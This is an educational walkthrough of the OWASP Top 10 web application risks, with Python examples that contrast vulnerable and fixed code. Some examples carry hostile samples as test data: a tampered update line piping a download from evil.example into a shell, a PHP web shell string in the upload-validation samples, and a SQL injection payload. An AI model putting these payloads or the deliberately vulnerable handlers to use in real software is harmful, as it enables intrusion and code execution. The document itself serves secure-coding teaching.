The Open Web Application Security Project (OWASP) is a non-profit organization dedicated to improving the security of software. Its best-known publication is the OWASP Top 10, a report that describes the ten most critical web application security risks together with mitigation advice. OWASP also provides documentation, tools, videos, and forums free of charge.
It is an open, community-driven project in which security experts grade and rank risks based on the following criteria:
Impact: how much damage a successful attack can cause.
Severity: how easily the issue can be found and exploited.
Frequency: how often the issue is found in real applications.
Security researchers use the report as a checklist when testing applications; it is just as useful to developers, helping them understand common security concerns and remove threats early in development, when fixes are cheapest.
The report is updated every few years as technology evolves.
A01 - Broken Access Control
Broken access control means the application does not verify that the requester is actually allowed to access the resource it asks for: authentication establishes who the user is, but authorization is never enforced.
For example:
Access to an application's admin dashboard should require an admin account. Suppose the application decides what to show based on a parameter carried in the request (a user ID, a role value, or similar). If a regular user changes that parameter to an administrator's value and the server performs no validation against the session's real permissions, the modified URL grants unauthorized access to the admin dashboard.
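The following is an added example, not code from the original page: a request handler that trusts a client-supplied object ID (the vulnerable form) next to one that decides authorization from the server-side session and user record. The invoice table, user directory, and handler names are constructed for the demonstration.

```python
# Added example (not from the original page): a parameter-driven access check.
# The invoice records, user directory and handler names are constructed.

# Constructed sample data: each invoice belongs to exactly one user.
INVOICES = {
    1001: {"owner": "alice", "amount": 120.00},
    1002: {"owner": "bob", "amount": 75.50},
}

# Constructed user directory with a server-side role per user.
USERS = {
    "alice": {"role": "user"},
    "bob": {"role": "user"},
    "carol": {"role": "admin"},
}


def get_invoice_vulnerable(session_user, invoice_id):
    """Returns whatever invoice the client asked for.

    The only check is that the record exists. A logged-in user who changes the
    invoice_id parameter in the URL reads other customers' invoices (an
    insecure direct object reference, one form of broken access control).
    """
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        raise LookupError("no such invoice")
    return invoice


def get_invoice_fixed(session_user, invoice_id):
    """Same lookup, but authorization is decided server-side.

    The caller's identity comes from the authenticated session, never from the
    request, and the record is released only if the session user owns it or
    holds the admin role.
    """
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        # Same error for "missing" and "not yours", so the endpoint cannot be
        # used to enumerate which IDs exist.
        raise PermissionError("not found or not authorized")
    role = USERS.get(session_user, {}).get("role")
    if invoice["owner"] != session_user and role != "admin":
        raise PermissionError("not found or not authorized")
    return invoice


def admin_dashboard(session_user, requested_role=None):
    """Admin-only view.

    requested_role mirrors the common bug of trusting a role value sent by the
    client; it is deliberately ignored and the role is read from the
    server-side user record instead.
    """
    role = USERS.get(session_user, {}).get("role")
    if role != "admin":
        raise PermissionError("admin role required")
    return {"users": sorted(USERS), "invoices": len(INVOICES)}


def is_denied(handler, session_user, invoice_id):
    """True if the handler refuses the request with PermissionError."""
    try:
        handler(session_user, invoice_id)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    # alice tampers with invoice_id: the vulnerable handler leaks bob's invoice.
    print("vulnerable:", get_invoice_vulnerable("alice", 1002))
    print("fixed denies alice->1002:", is_denied(get_invoice_fixed, "alice", 1002))
    # Sending role=admin in the request does not help a plain user.
    try:
        admin_dashboard("alice", requested_role="admin")
    except PermissionError as exc:
        print("dashboard:", exc)
    print("admin view for carol:", admin_dashboard("carol"))
```

The fixed handler returns the same error whether the record is missing or belongs to someone else; distinguishing the two would let an attacker enumerate valid IDs even when access is denied.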
A02 - Cryptographic Failures
If sensitive information is stored or transmitted without adequate protection and ends up reachable by unauthorized parties, incidents such as the Uber data leak can take place.
Examples of sensitive information whose exposure matters are as follows:
Session tokens
Login IDs and passwords
Online transactions
Personal details (SSN, health records) etc.
If the web application protects this data with outdated or weak cryptography, for example fast, unsalted password hashes such as MD5 that can be cracked offline, or transport without TLS, an attacker who obtains the stored data or intercepts it in transit can recover credentials and take over the victim's account. Because the weakness applies to data at rest and in transit alike, this is a very serious issue and is ranked second in the OWASP Top 10 list.
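As an added example (not from the original page), the block below shows why an unsalted fast hash is a cryptographic failure for stored passwords: a constructed "leaked" table of MD5 hashes is recovered with a five-word wordlist, while the same passwords stored with salted PBKDF2-HMAC-SHA256 give no two users the same record and are verified in constant time. The wordlist, usernames, and iteration count are assumptions.

```python
# Added example (not from the original page): unsalted MD5 versus salted PBKDF2.
# The wordlist and the "leaked" rows are constructed for the demonstration.
import hashlib
import hmac
import os

# Constructed attacker wordlist; real ones hold billions of entries.
WORDLIST = ["123456", "password", "letmein", "qwerty", "summer2023"]


def weak_hash(password):
    """Unsalted MD5: fast, deterministic and trivially reversed with a wordlist
    or precomputed table. Identical passwords produce identical hashes."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_weak(hash_hex):
    """Offline dictionary attack: hash each candidate and compare.
    Returns the password if it is in the wordlist, else None."""
    for candidate in WORDLIST:
        if weak_hash(candidate) == hash_hex:
            return candidate
    return None


def strong_hash(password, salt=None, iterations=600_000):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt and a high iteration
    count (600k is the current OWASP guidance for this construction).
    Returns a self-describing record so parameters can be raised later."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_strong(password, stored):
    """Recomputes the hash with the stored salt and iteration count and
    compares in constant time, so timing does not leak how much matched."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash record format")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed "leaked" table of unsalted hashes.
    leaked = {"alice": weak_hash("summer2023"), "bob": weak_hash("letmein")}
    for user, h in leaked.items():
        print(f"{user}: md5={h} cracked={crack_weak(h)}")
    record = strong_hash("summer2023")
    print("pbkdf2 record:", record)
    print("verify correct:", verify_strong("summer2023", record))
    print("verify wrong  :", verify_strong("summer2024", record))
    # Same password, different salt -> different record, so no precomputed table helps.
    print("two salted records equal?", strong_hash("summer2023") == strong_hash("summer2023"))
```

A dedicated password hash (Argon2id, scrypt, or bcrypt) is preferable where a library is available; PBKDF2 is used here because it ships with the standard library and shows the same two properties that matter: a per-user salt and a deliberately slow computation.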
A03 - Injection
When a web application trusts user input and passes it to an interpreter without validating or sanitizing it, injection attacks are bound to happen.
For example, Structured Query Language (SQL) injection is an attack in which, because user input is inserted directly into a query, the user can add their own SQL and the database executes it. The impact is that the attacker can read or modify sensitive information such as personally identifiable information (PII), which may include credit card details.
A common test for SQL injection is passing "1 OR 1=1" where the application expects just "1". Because "1=1" is always true and it is joined to the original condition with OR, the WHERE clause matches every row. So, if the web application is vulnerable to SQL injection, the condition is always satisfied and the application returns records the user should never see.
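The following is an added example (not from the original page) that runs the "1 OR 1=1" case against an in-memory SQLite table and shows the parameterized query that defeats it. The table, its rows, and the column names are constructed for the demonstration.

```python
# Added example (not from the original page): string-built SQL versus a bound
# parameter. The customers table and its rows are constructed.
import sqlite3


def build_db():
    """Creates an in-memory database with a constructed customers table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, card_last4 TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers (id, name, card_last4) VALUES (?, ?, ?)",
        [(1, "alice", "4242"), (2, "bob", "1881"), (3, "carol", "0005")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, customer_id):
    """Concatenates the user-supplied id straight into the SQL text.

    For the input "1" the statement is
        SELECT ... WHERE id = 1
    For the input "1 OR 1=1" it becomes
        SELECT ... WHERE id = 1 OR 1=1
    which is true for every row, so the whole table comes back.
    """
    query = "SELECT id, name, card_last4 FROM customers WHERE id = " + customer_id
    return conn.execute(query).fetchall()


def lookup_safe(conn, customer_id):
    """Validates the type, then passes the value as a bound parameter.

    The driver sends the SQL and the value separately, so the value is never
    parsed as SQL; even without the isdigit() check, "1 OR 1=1" would simply
    be compared against the id column and match nothing.
    """
    if not customer_id.isdigit():
        return []
    return conn.execute(
        "SELECT id, name, card_last4 FROM customers WHERE id = ?",
        (int(customer_id),),
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, input '1'        :", lookup_vulnerable(db, "1"))
    print("vulnerable, input '1 OR 1=1' :", lookup_vulnerable(db, "1 OR 1=1"))
    print("safe, input '1'              :", lookup_safe(db, "1"))
    print("safe, input '1 OR 1=1'       :", lookup_safe(db, "1 OR 1=1"))
```

The same rule applies to every interpreter the application talks to (shell commands, LDAP, NoSQL filters, OS paths): keep code and data separate, and treat escaping as a last resort rather than the primary defence.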
A04 - Insecure Design
The latest OWASP Top 10 revision added this category for risks that stem from design and architectural flaws rather than implementation bugs. It recommends threat modeling, secure design patterns, and reference architectures from the earliest stages of the design process, because a flawed design cannot be repaired by a perfect implementation.
For example:
File upload vulnerability: many web applications let users upload a file and ask for PDF, JPEG, or PNG. If other types, such as PHP or JS files, can be uploaded as well, the design has failed: only the requested formats should be accepted, and the check has to go beyond the file extension (verify the content, limit the size, and store uploads outside the web root under a server-generated name).
The impact of this vulnerability is that an attacker can upload a web shell or other malware that the server will then execute, possibly resulting in full compromise of the server.
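The following is an added example (not from the original page) of an upload check that is not satisfied by the file name alone: it enforces an extension allowlist, rejects double extensions and path components, compares the leading bytes against the magic number for the claimed type, limits the size, and refuses content that contains server-side script markers. The allowed types, marker list, and sample uploads are constructed for the demonstration.

```python
# Added example (not from the original page): validating an upload by more than
# its name. Allowed types, magic numbers and sample uploads are constructed.
import os
import re

# Allowed extension -> leading bytes (magic number) the content must start with.
ALLOWED_TYPES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "pdf": [b"%PDF-"],
}

# Content never accepted regardless of the claimed type (constructed list of
# server-side script markers; extend it for the platform in use).
FORBIDDEN_MARKERS = [b"<?php", b"<%", b"<script"]

MAX_SIZE = 5 * 1024 * 1024  # 5 MiB


def validate_upload(filename, data):
    """Returns (ok, reason). ok is True only if every check passes."""
    base = os.path.basename(filename)  # drop any directory component (../ tricks)
    if not re.fullmatch(r"[A-Za-z0-9._-]+", base):
        return False, "filename contains disallowed characters"
    parts = base.lower().split(".")
    if len(parts) != 2:
        # Rejects "shell.php.png"-style double extensions and bare names.
        return False, "exactly one extension is required"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    if len(data) > MAX_SIZE:
        return False, "file too large"
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match claimed type"
    if any(marker in data for marker in FORBIDDEN_MARKERS):
        return False, "script content embedded in file"
    return True, "ok"


# Constructed sample uploads.
SAMPLES = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "shell.php": b"<?php system($_GET['cmd']); ?>",
    "shell.php.png": b"\x89PNG\r\n\x1a\n<?php system($_GET['cmd']); ?>",
    "fake.jpg": b"GIF89a" + b"\x00" * 8,
    "poly.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8 + b"<?php system($_GET['cmd']); ?>",
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        print(f"{name:14s} -> {validate_upload(name, content)}")
```

Even with every check passing, the stored file should be served with a fixed Content-Type from a location the web server never executes; content validation reduces the attack surface but is not a substitute for that separation.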
A05 - Security Misconfiguration
Security misconfiguration vulnerabilities arise from insecure or incomplete configuration of the application, its frameworks, and the servers it runs on.
For example:
Unnecessary open ports and services, unchanged default accounts and settings, missing or incorrect HTTP security headers, verbose error messages, and overly broad privileges are common examples that leave an application open to a data breach.
A06 - Vulnerable and Outdated Components
Many web applications run outdated versions of their platform or depend on third-party components and frameworks. Vulnerabilities in these components often have publicly available exploits, and using such an exploit requires little skill, which makes the application an easy target.
For example:
The 2017 Equifax data breach occurred because the organization was running a version of Apache Struts with a publicly known, unpatched vulnerability. The initial compromise exposed internal credentials, which the attackers then used to move deeper into Equifax's internal networks.
A07 - Identification and Authentication Failures
This category covers weaknesses in how an application identifies and authenticates its users. Such weaknesses let attackers take over accounts through stolen or guessed login credentials, abusable password-recovery flows, and exposed session IDs. Examples include URL rewriting that places session IDs in the URL.
Automated credential attacks, credential stuffing above all, are the main way broken authentication is exploited. Credential stuffing abuses users' habit of reusing the same username and password across many online accounts: attackers replay credential pairs stolen from one breach against other services and gain unauthorized access wherever they match. Strong, unique passwords, server-side rate limiting and account lockout, and multi-factor authentication mitigate this risk.
For example: an online shopping platform supports URL rewriting and puts the session ID in the URL. Anyone who obtains that URL, from a shared link, browser history, a proxy log, or the Referer header sent to a third-party site, can present the same session ID and act as the logged-in user.
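The following is an added example (not from the original page) of a login path that resists credential stuffing and brute force: consecutive failures lock the account for a fixed period, attempts per source address are throttled over a sliding window, unknown and known usernames take the same time and return the same message, and the session ID is random and handed back for a cookie rather than placed in a URL. The user store, thresholds, PBKDF2 parameters, and the injectable clock are assumptions made for the demonstration.

```python
# Added example (not from the original page): lockout, per-source throttling
# and a cookie-bound session ID. Thresholds and the user store are constructed.
import hashlib
import hmac
import os
import secrets
import time

MAX_FAILURES = 5          # consecutive failures before the account locks
LOCKOUT_SECONDS = 900     # lock duration (15 minutes)
IP_WINDOW = 60            # sliding window for per-source throttling (seconds)
IP_MAX_ATTEMPTS = 20      # attempts allowed per source per window


class FakeClock:
    """Demo clock; advance .t to simulate time passing."""
    def __init__(self, start=1_000_000.0):
        self.t = start

    def __call__(self):
        return self.t


def make_record(password, iterations=600_000):
    """Stores a per-user salt and a PBKDF2-HMAC-SHA256 hash, never the password."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


class LoginGuard:
    def __init__(self, users, clock=time.time, iterations=600_000):
        self.users = users          # username -> (salt, hash) from make_record
        self.clock = clock
        self.iterations = iterations
        self.failures = {}          # username -> (consecutive failures, locked_until)
        self.ip_hits = {}           # ip -> recent attempt timestamps
        self.sessions = {}          # session id -> username

    def _source_allowed(self, ip):
        now = self.clock()
        hits = [t for t in self.ip_hits.get(ip, []) if now - t < IP_WINDOW]
        hits.append(now)
        self.ip_hits[ip] = hits
        return len(hits) <= IP_MAX_ATTEMPTS

    def login(self, username, password, ip):
        """Returns (status, session_id). status is 'ok', 'bad_credentials',
        'locked' or 'rate_limited'; session_id is None unless status is 'ok'."""
        if not self._source_allowed(ip):
            return "rate_limited", None
        now = self.clock()
        count, locked_until = self.failures.get(username, (0, 0.0))
        if now < locked_until:
            return "locked", None
        if locked_until:
            count, locked_until = 0, 0.0   # lock expired: start counting afresh
        record = self.users.get(username)
        if record is None:
            # Hash anyway so unknown and known usernames take the same time.
            hashlib.pbkdf2_hmac("sha256", password.encode(), b"\0" * 16, self.iterations)
            return "bad_credentials", None    # same answer as a wrong password
        salt, stored = record
        calc = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.iterations)
        if not hmac.compare_digest(calc, stored):
            count += 1
            if count >= MAX_FAILURES:
                locked_until = now + LOCKOUT_SECONDS
            self.failures[username] = (count, locked_until)
            return "bad_credentials", None
        self.failures.pop(username, None)
        # The session ID is random and is returned to be set as an HttpOnly,
        # Secure cookie; it must never be placed in a URL, where it leaks via
        # browser history, proxy logs and the Referer header.
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = username
        return "ok", sid


if __name__ == "__main__":
    users = {"alice": make_record("correct-horse-battery")}
    clock = FakeClock()
    guard = LoginGuard(users, clock)
    for pw in ["123456", "password", "qwerty", "letmein", "alice1"]:  # constructed stuffing list
        print("attacker guess:", guard.login("alice", pw, "198.51.100.9"))
    print("alice during lockout:", guard.login("alice", "correct-horse-battery", "203.0.113.5"))
    clock.t += LOCKOUT_SECONDS + 1
    print("alice after lockout :", guard.login("alice", "correct-horse-battery", "203.0.113.5"))
    for _ in range(IP_MAX_ATTEMPTS + 1):
        status, _ = guard.login("nobody", "x", "198.51.100.9")
    print("21st attempt from one source:", status)
```

Lockout on its own creates a denial-of-service lever (an attacker can lock out any user by guessing wrong five times), which is why the per-source throttle, a generic error message, and multi-factor authentication are combined with it rather than relied on in isolation.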
A08 - Software and Data Integrity Failures
Software and data integrity failures occur when code or data is trusted without any check that it has not been tampered with. Typical cases are applications that pull plugins, libraries, or updates from untrusted sources or CDNs, insecure CI/CD pipelines, and auto-update features that install whatever they download. Data is increasingly stored and passed between systems where it can be altered, by accident or by an attacker, so the application needs a way to tell when software or data it relies on has changed.
For example:
Imagine an application that downloads an update package and installs it without verifying a signature or checksum. If the file is modified in transit or at its source, the application runs code it never intended to run, and it has no way to notice. That is a software integrity failure; the same applies to data the application reads back and treats as trusted, such as serialized objects, when nothing confirms it is unchanged.
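The following is an added example (not from the original page) of the check that example lacks. It verifies a downloaded artifact two ways before "installing" it: against a pinned SHA-256 digest, which catches corruption or substitution when the expected digest comes from a trusted channel, and against an HMAC-SHA256 tag, which additionally proves the artifact came from a holder of the key. The package bytes, the key, and the tampering are constructed; a real deployment would use an asymmetric signature so that consumers hold no secret.

```python
# Added example (not from the original page): integrity and authenticity checks
# on an artifact before use. Package, key and tampering are constructed.
import hashlib
import hmac


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_digest(data, expected_hex):
    """True only if data hashes to the pinned digest (constant-time compare)."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def sign(data, key):
    """Producer side: HMAC-SHA256 tag over the artifact."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_signature(data, tag_hex, key):
    """Consumer side: recompute the tag and compare in constant time."""
    return hmac.compare_digest(sign(data, key), tag_hex)


def install_update(package, expected_hex, tag_hex, key):
    """Refuses to 'install' unless both checks pass. Returns a status string
    rather than executing anything; a real installer would unpack/run here."""
    if not verify_digest(package, expected_hex):
        return "rejected: digest mismatch"
    if not verify_signature(package, tag_hex, key):
        return "rejected: bad signature"
    return "installed"


if __name__ == "__main__":
    key = b"constructed-shared-secret"            # would live in a KMS/HSM, not in source
    package = b"#!/bin/sh\necho 'applying update 1.2.3'\n"
    pinned = sha256_hex(package)                   # published by the vendor
    tag = sign(package, key)                       # published by the vendor
    print("genuine package       :", install_update(package, pinned, tag, key))
    tampered = package.replace(b"echo", b"curl http://evil.example/x | sh; echo")
    print("tampered, old digest  :", install_update(tampered, pinned, tag, key))
    # Attacker rewrites the download and the digest next to it, but has no key:
    print("tampered, new digest  :", install_update(tampered, sha256_hex(tampered), tag, key))
```

The third case is the one that matters in practice: a digest published beside the download protects against nothing if the attacker controls both, so the digest must come from a separate trusted channel, or the artifact must carry a signature the attacker cannot produce.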
A09 - Security Logging and Monitoring Failures
This means the systems are not properly recording and watching what happens to them, so when something bad does happen it may not be noticed until it is too late. Breaches that go undetected for months are usually a symptom of exactly this failure, and the result is prolonged access for the attacker and theft of data.
This is where monitoring comes in: the system raises an alert when something happens to the web application (failed logins in bulk, unexpected errors, changes to privileged accounts), so the team can investigate and address the issue in a timely manner. The logs themselves must be protected from tampering and kept long enough to be useful in an investigation.
Without logging and monitoring in place, an organization cannot tell what is happening to its systems during an attack, nor reconstruct afterwards what was accessed.
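The following is an added example (not from the original page) of the kind of detection that logging makes possible: a small detector run over constructed authentication log lines flags a source that produces many failed logins in a short window and any successful login from that source afterwards. The log format, field names, thresholds, and the sample lines are all assumptions.

```python
# Added example (not from the original page): brute-force detection over
# constructed auth log lines. Format, thresholds and sample data are assumed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>LOGIN_OK|LOGIN_FAIL) user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)
FAIL_THRESHOLD = 5            # failures from one source inside WINDOW
WINDOW = timedelta(minutes=5)

# Constructed sample log (documentation-range addresses).
SAMPLE_LOG = """\
2024-03-01T10:00:01 auth LOGIN_OK user=alice ip=203.0.113.5
2024-03-01T10:00:10 auth LOGIN_FAIL user=bob ip=198.51.100.9
2024-03-01T10:00:11 auth LOGIN_FAIL user=carol ip=198.51.100.9
2024-03-01T10:00:12 auth LOGIN_FAIL user=dave ip=198.51.100.9
2024-03-01T10:00:13 auth LOGIN_FAIL user=erin ip=198.51.100.9
2024-03-01T10:00:14 auth LOGIN_FAIL user=frank ip=198.51.100.9
2024-03-01T10:00:15 auth LOGIN_OK user=frank ip=198.51.100.9
2024-03-01T10:30:00 auth LOGIN_FAIL user=alice ip=203.0.113.5
2024-03-01T10:30:05 auth LOGIN_OK user=alice ip=203.0.113.5
"""


def parse(text):
    """Turns log text into a list of event dicts, skipping unparseable lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # a real pipeline would count and alert on these too
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "result": m["result"],
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect(events):
    """Returns a list of alert strings. Events must be in time order."""
    alerts = []
    fails_by_ip = defaultdict(list)   # ip -> failure timestamps inside the window
    flagged_ips = set()
    for ev in events:
        ip, ts = ev["ip"], ev["ts"]
        fails_by_ip[ip] = [t for t in fails_by_ip[ip] if ts - t <= WINDOW]
        if ev["result"] == "LOGIN_FAIL":
            fails_by_ip[ip].append(ts)
            if len(fails_by_ip[ip]) >= FAIL_THRESHOLD and ip not in flagged_ips:
                flagged_ips.add(ip)
                alerts.append(
                    f"{ts.isoformat()} brute force: {len(fails_by_ip[ip])} failures from {ip}"
                )
        elif ip in flagged_ips:
            # A success right after a burst is the event worth paging on.
            alerts.append(f"{ts.isoformat()} success after burst: {ev['user']} from {ip}")
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

Note what the detector needs from the log: a timestamp, the outcome, the account, and the source address on every authentication event. A log that records only successes, or omits the source, cannot support this rule, which is the practical meaning of a logging failure.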
A10 - Server Side Request Forgery (SSRF)
SSRF occurs when an attacker can make the server send a request to a destination of the attacker's choosing. Because the request originates from the server, it can reach internal services, cloud metadata endpoints, and other resources that are not exposed to the internet, and it can be used to read data from them, attack them, or in some cases harm the server itself.
For example:
A web application is vulnerable to SSRF if it fetches a remote resource from a URL supplied by the user without validating it.
– A user might supply a remote resource URL such as http://target.example.com/inc/sharefile.asp
– If the web application performs no validation of the URL, the user can replace it with an internal address (a loopback, private, or link-local address, or a hostname that resolves to one) and use the server to reach internal networks and other internal resources.
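The following is an added example (not from the original page) of validating a user-supplied URL before the server fetches it: it restricts the scheme and port, rejects credentials in the URL, resolves the host, and refuses any answer that is loopback, private, link-local (including the 169.254.169.254 cloud metadata address), or otherwise non-public. The resolver is injectable so the example runs offline against a constructed name table; the fetch itself is not performed, and the name table, IP addresses, and allowed ports are assumptions.

```python
# Added example (not from the original page): an outbound-URL check for an SSRF-
# prone fetch. The DNS table, addresses and port allowlist are constructed.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def default_resolver(host):
    """All IPv4/IPv6 answers for host from the system resolver."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(addr_text):
    addr = ipaddress.ip_address(addr_text)
    # is_global is False for private, loopback, link-local (which covers
    # 169.254.169.254), multicast, reserved and unspecified ranges.
    if not addr.is_global:
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return is_public_address(str(addr.ipv4_mapped))   # ::ffff:10.0.0.1 etc.
    return True


def check_outbound_url(url, resolver=default_resolver):
    """Returns (ok, reason). Only (True, 'ok') means the fetch may proceed."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    try:
        addresses = resolver(host)
    except (socket.gaierror, OSError):
        return False, "host does not resolve"
    if not addresses:
        return False, "host does not resolve"
    for addr in addresses:
        try:
            if not is_public_address(addr):
                return False, f"resolves to non-public address {addr}"
        except ValueError:
            return False, "resolver returned a non-IP value"
    return True, "ok"


# Constructed name table standing in for DNS so the example runs offline.
FAKE_DNS = {
    "target.example.com": {"93.184.216.34"},
    "localhost": {"127.0.0.1", "::1"},
    "internal.corp": {"10.20.30.40"},
    "rebind.example": {"169.254.169.254"},              # name pointing at the metadata service
    "dual.example": {"93.184.216.34", "192.168.1.10"},  # one public and one private answer
}


def fake_resolver(host):
    try:
        return {ipaddress.ip_address(host).compressed}   # literal IP address
    except ValueError:
        return FAKE_DNS.get(host, set())


if __name__ == "__main__":
    for u in [
        "http://target.example.com/inc/sharefile.asp",
        "http://localhost/admin",
        "http://127.0.0.1:80/",
        "http://internal.corp/",
        "http://169.254.169.254/latest/meta-data/",
        "http://rebind.example/",
        "http://dual.example/",
        "ftp://target.example.com/",
        "http://user:pw@target.example.com/",
        "http://target.example.com:8080/",
    ]:
        print(f"{u:44s} -> {check_outbound_url(u, fake_resolver)}")
```

Two caveats a practitioner should carry over into real code: the check and the fetch must use the same resolved address (otherwise a DNS answer that changes between the two, DNS rebinding, slips through), and the HTTP client must not follow redirects on its own, since a public host can redirect the server to an internal one after the check has passed. Where the set of legitimate destinations is known, an allowlist of hosts is simpler and stronger than this denylist of address ranges.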
Resources: